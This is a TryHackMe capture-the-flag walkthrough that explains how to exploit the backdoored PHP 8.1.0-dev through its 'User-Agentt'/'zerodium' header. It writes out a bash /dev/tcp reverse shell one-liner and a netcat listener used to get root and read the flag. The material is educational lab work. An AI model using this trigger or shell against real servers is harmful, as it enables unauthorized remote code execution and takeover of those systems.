TryHackMe | Agent T Walkthrough
Exploiting PHP 8.1.0-dev backdoor
Summary
This room was created by John Hammond and is an example of what happens when you use outdated, or perhaps even compromised, software. This room highlights PHP version 8.1.0-dev which fell victim to malicious commits on the PHP Github repository that creates a backdoor on any web server using this compromised version. If you’d like more information on the story behind this malicious attack, check out this blog here. Let’s take a look at the room!
Enumeration
Looking at the hint provided by the task we can focus our efforts on the HTTP responses provided by the web server. First, let’s do our standard nmap scan:
The service version scan has identified that this web server is running PHP 8.1.0-dev. Now let’s look at the HTTP response when we visit the site. For this I’ll use Burp Suite. Navigate to the website using the IP address provided after starting up the machine and capture the HTTP traffic. Looking at the rendered web page it looks like we are dealing with an Admin Dashboard of some kind. Clicking through, the buttons either did nothing or yielded a 404 error. Now, locate the first GET request to the website and we can confirm that the server is running PHP 8.1.0-dev by analyzing the response headers, specifically the “X-Powered-By” header:
Research
Let’s search this PHP version using the Exploit-DB CLI search tool, searchsploit. Indeed the search yields a result for 8.1.0-dev and also provides a Python script we can use to exploit the vulnerability.
We aren’t skids around here, so instead of just running the script let’s try to learn how this script works by reading the code. The developers of the code provided helpful links including a blog post that explains the backstory of the exploit, take a look.
Further, by looking at the python script, it’s a rather simple script and exploit. Basically, we are interacting with the website using the python requests module and we’re adding a special header that allows us to perform remote code execution and then prints the response from the server. We are sending a User-Agentt header along with any PHP code we’d like to run on the remote server. For this exploit let’s consider using the system command. However, the exploit will only work by prepending zerodium to the command we wish to run. Executing this in Burp using Repeater looks like this:
Now that we have a proof of concept, let’s exploit this vulnerability to compromise the server.
Exploit
In this example I decided to spawn a reverse shell using the User-Agentt method above. There are many ways to spawn reverse shells. In this instance I decided to use the shell code suggested in the blog: 'bash -c "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"'. Here I started a netcat listener using nc -lvnp 443 and used Burp Repeater to deliver my exploit:
SUCCESS!
Post Exploitation and Data Exfiltration
Now that we have a shell as root, the last step is to find the flag. Since this is a TryHackMe room, it’s common for flags to be saved in files such as “flag.txt”. I used find here to search for flag: find / -name *flag* 2>/dev/null
Bing Pot! Our flag is located at /flag.txt which we can easily read since we are root.
Conclusion
PHP 8.1.0-dev is a dangerous version of PHP that creates a backdoor into any web server running it. Hackers can exploit this vulnerability and perform Remote Code Execution. Keep an eye out for servers running this particular version since it’s trivial to compromise a server with this particular vulnerability.
I hope you enjoyed this walk through! Please contact me for any questions.
